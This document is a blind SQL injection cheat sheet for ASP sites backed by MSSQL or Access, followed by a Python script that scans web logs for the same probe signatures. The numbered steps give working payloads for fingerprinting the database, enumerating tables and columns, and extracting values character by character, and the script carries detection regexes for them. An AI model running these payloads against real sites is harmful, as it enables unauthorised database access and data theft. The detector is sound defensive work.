1. Check whether the parameter is injectable: ;and 1=1 ;and 1=2

2. Preliminary check for MSSQL: ;and user>0

3. When the injected parameter is a string: 'and [query condition] and ''='

4. When a search parameter is not filtered: 'and [query condition] and '%25'='

5. Identify the database system:

;and (select count(*) from sysobjects)>0   mssql

;and (select count(*) from msysobjects)>0   access

6. Guess the database name: ;and (select Count(*) from [database name])>0

7. Guess a column name: ;and (select Count([column name]) from [database name])>0

8. Guess the record length of a column: ;and (select top 1 len([column name]) from [database name])>0

9. (1) Guess the ASCII value of a column (Access):

;and (select top 1 asc(mid([column name],1,1)) from [database name])>0

(2) Guess the ASCII value of a column (MSSQL):

;and (select top 1 unicode(substring([column name],1,1)) from [database name])>0

10. Test the privilege structure (MSSQL)
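Seen from the defensive side, each step of the probe sequence above leaves a recognizable signature in web-server logs. The following Python example is added here and is not part of the original cheat sheet: it scans a few constructed access-log lines, URL-decodes the query string (twice, because the %25 trick in step 4 survives a single decode), and labels each request with the step of this list whose signature it contains. The log format, parameter names and regular expressions are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (method, path, status); not real traffic.
SAMPLE_LOG = """\
GET /news.asp?id=12 200
GET /news.asp?id=12%20and%201=1 200
GET /news.asp?id=12%20and%201=2 200
GET /news.asp?id=12%20and%20user>0 500
GET /news.asp?id=12%20and%20(select%20count(*)%20from%20sysobjects)>0 200
GET /news.asp?id=12%20and%20(select%20count(*)%20from%20msysobjects)>0 500
GET /search.asp?q=shoes 200
GET /news.asp?id=12%20and%20(select%20top%201%20asc(mid(name,1,1))%20from%20admin)>0 200
"""

# One signature per family of probes in the cheat sheet; patterns are
# matched against the lowercased, whitespace-normalised query string.
PROBE_FAMILIES = [
    ("boolean tautology (step 1)", re.compile(r"\band\s+1\s*=\s*[12]\b")),
    ("mssql user>0 fingerprint (step 2)", re.compile(r"\band\s+user\s*>\s*0")),
    ("mssql sysobjects fingerprint (step 5)", re.compile(r"\bfrom\s+sysobjects\b")),
    ("access msysobjects fingerprint (step 5)", re.compile(r"\bfrom\s+msysobjects\b")),
    ("table/column enumeration (steps 6-7)", re.compile(r"select\s+count\s*\(")),
    ("length probing (step 8)", re.compile(r"select\s+top\s+1\s+len\s*\(")),
    ("char-by-char extraction (step 9)",
     re.compile(r"(asc\s*\(\s*mid\s*\(|unicode\s*\(\s*substring\s*\()")),
]


def normalize(query_string):
    """Decode URL encoding twice (handles %25 -> %), collapse whitespace, lowercase."""
    text = unquote(unquote(query_string))
    return re.sub(r"\s+", " ", text).lower()


def classify_request(request_line):
    """Return the names of every probe family whose signature appears in the request."""
    parts = request_line.split()
    path = parts[1] if len(parts) > 1 else request_line
    if "?" not in path:
        return []
    query = normalize(path.split("?", 1)[1])
    return [name for name, pattern in PROBE_FAMILIES if pattern.search(query)]


def scan_log(log_text):
    """Return (line_no, raw_line, families) for each line that triggers at least one family."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        families = classify_request(line)
        if families:
            hits.append((line_no, line, families))
    return hits


if __name__ == "__main__":
    for line_no, line, families in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(families)}")
        print(f"    {line}")
```

A single request may match several families (a sysobjects fingerprint is also a `select count(` enumeration), which is why `classify_request` returns a list; the ordered sequence of families across one client's requests is a stronger indicator than any single match.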